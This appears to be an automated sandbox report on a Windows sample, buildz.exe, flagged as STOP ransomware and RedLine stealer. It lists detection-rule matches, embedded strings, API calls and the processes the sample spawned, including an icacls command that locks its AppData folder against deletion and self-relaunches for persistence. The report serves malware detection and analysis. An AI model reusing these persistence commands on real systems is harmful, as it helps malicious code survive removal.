          Source: 0000000A.00000002.2325833374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0000000A.00000002.2325833374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 00000000.00000002.2097760576.0000000000A2C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 0000000B.00000002.2426701504.0000000002260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: buildz.exe PID: 5576, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: buildz.exe PID: 5272, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: buildz.exe PID: 5240, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: buildz.exe PID: 7120, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: buildz.exe PID: 432, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: buildz.exe PID: 940, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: buildz.exe PID: 6848, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: buildz.exe PID: 5700, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: buildz.exe PID: 2148, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: buildz.exe PID: 4708, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: buildz.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: buildz.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\block.obj
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\nkp.obj
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\usb.obj
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\tcglib.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\guiddef.obj
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\ramapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\diskapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\sdiapi.obj
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blockapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\uwfapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\locate.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\disk.obj
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\sdiapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blktable.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blocksup.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\partapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\uwfapi.obj
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\ramapi.obj
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\debugport.obj
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\debugport.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fve.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fvelog.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fveretailunlock.obj
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blktable.obj
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\udp.obj
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\seccmd.obj
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\uriapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fveretailunlock.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fvelog.obj
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vhdutil.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vmbusapi.obj
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blockapi.obj
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vdiskapi.obj
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\seccmd.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fileapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\serialapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\ramdiskvhd.obj
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vhd.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fve.obj
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\device.obj
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\edriveapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vmbusapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\nbp.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\nkp.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\usb.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blkcache.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\disk.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\locate.obj
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\block.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\edriveapi.obj
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fileapi.obj
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\udp.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\device.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\serialapi.obj
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vmbus.obj
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vmbus.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\devlog.obj
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vhd2.obj
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blocksup.obj
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\partition.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blkcache.obj
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\uriapi.obj
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\guiddef.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\tcglib.obj
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\ramdiskvhd.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vdiskapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\devlog.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vhdutil.obj
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vhd2.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\partapi.obj
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\udpapi.obj
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\udpapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\partition.obj
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\nbp.obj
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\diskapi.obj
          Source: download.error0.6.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vhd.obj
          Source: classification engineClassification label: mal100.rans.spre.troj.spyw.evad.winEXE@18/1328@4/2
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,2_2_00411900
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_00A2C7C6 CreateToolhelp32Snapshot,Module32First,0_2_00A2C7C6
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,__localtime64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,2_2_0040D240
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\geo[1].jsonJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeMutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
          Source: C:\Users\user\Desktop\buildz.exeCommand line argument: p}@0_2_00407CC0
          Source: C:\Users\user\Desktop\buildz.exeCommand line argument: --Admin2_2_00419F90
          Source: C:\Users\user\Desktop\buildz.exeCommand line argument: IsAutoStart2_2_00419F90
          Source: C:\Users\user\Desktop\buildz.exeCommand line argument: IsTask2_2_00419F90
          Source: C:\Users\user\Desktop\buildz.exeCommand line argument: --ForNetRes2_2_00419F90
          Source: C:\Users\user\Desktop\buildz.exeCommand line argument: IsAutoStart2_2_00419F90
          Source: C:\Users\user\Desktop\buildz.exeCommand line argument: IsTask2_2_00419F90
          Source: C:\Users\user\Desktop\buildz.exeCommand line argument: --Task2_2_00419F90
          Source: C:\Users\user\Desktop\buildz.exeCommand line argument: --AutoStart2_2_00419F90
          Source: C:\Users\user\Desktop\buildz.exeCommand line argument: --Service2_2_00419F90
          Source: C:\Users\user\Desktop\buildz.exeCommand line argument: X1P2_2_00419F90
          Source: C:\Users\user\Desktop\buildz.exeCommand line argument: --Admin2_2_00419F90
          Source: C:\Users\user\Desktop\buildz.exeCommand line argument: runas2_2_00419F90
          Source: C:\Users\user\Desktop\buildz.exeCommand line argument: x2Q2_2_00419F90
          Source: C:\Users\user\Desktop\buildz.exeCommand line argument: x*P2_2_00419F90
          Source: C:\Users\user\Desktop\buildz.exeCommand line argument: C:\Windows\2_2_00419F90
          Source: C:\Users\user\Desktop\buildz.exeCommand line argument: D:\Windows\2_2_00419F90
          Source: C:\Users\user\Desktop\buildz.exeCommand line argument: 7P2_2_00419F90
          Source: C:\Users\user\Desktop\buildz.exeCommand line argument: %username%2_2_00419F90
          Source: C:\Users\user\Desktop\buildz.exeCommand line argument: F:\2_2_00419F90
          Source: buildz.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\buildz.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: buildz.exeReversingLabs: Detection: 91%
          Source: buildz.exeVirustotal: Detection: 80%
          Source: buildz.exeString found in binary or memory: set-addPolicy
          Source: buildz.exeString found in binary or memory: id-cmc-addExtensions
          Source: buildz.exeString found in binary or memory: set-addPolicy
          Source: buildz.exeString found in binary or memory: id-cmc-addExtensions
          Source: buildz.exeString found in binary or memory: set-addPolicy
          Source: buildz.exeString found in binary or memory: id-cmc-addExtensions
          Source: buildz.exeString found in binary or memory: set-addPolicy
          Source: buildz.exeString found in binary or memory: id-cmc-addExtensions
          Source: C:\Users\user\Desktop\buildz.exeFile read: C:\Users\user\Desktop\buildz.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\buildz.exe "C:\Users\user\Desktop\buildz.exe"
          Source: C:\Users\user\Desktop\buildz.exeProcess created: C:\Users\user\Desktop\buildz.exe "C:\Users\user\Desktop\buildz.exe"
          Source: C:\Users\user\Desktop\buildz.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08" /deny *S-1-1-0:(OI)(CI)(DE,DC)
          Source: C:\Users\user\Desktop\buildz.exeProcess created: C:\Users\user\Desktop\buildz.exe "C:\Users\user\Desktop\buildz.exe" --Admin IsNotAutoStart IsNotTask
          Source: unknownProcess created: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe --Task
          Source: C:\Users\user\Desktop\buildz.exeProcess created: C:\Users\user\Desktop\buildz.exe "C:\Users\user\Desktop\buildz.exe" --Admin IsNotAutoStart IsNotTask
          Source: unknownProcess created: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe "C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe" --AutoStart
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeProcess created: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe "C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe" --AutoStart
          Source: unknownProcess created: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe "C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe" --AutoStart
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeProcess created: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe "C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe" --AutoStart
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeProcess created: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe --Task
          Source: C:\Users\user\Desktop\buildz.exeProcess created: C:\Users\user\Desktop\buildz.exe "C:\Users\user\Desktop\buildz.exe"Jump to behavior
          Source: C:\Users\user\Desktop\buildz.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08" /deny *S-1-1-0:(OI)(CI)(DE,DC)Jump to behavior
          Source: C:\Users\user\Desktop\buildz.exeProcess created: C:\Users\user\Desktop\buildz.exe "C:\Users\user\Desktop\buildz.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeProcess created: C:\Users\user\Desktop\buildz.exe "C:\Users\user\Desktop\buildz.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeProcess created: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe --TaskJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeProcess created: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe "C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe" --AutoStartJump to behavior
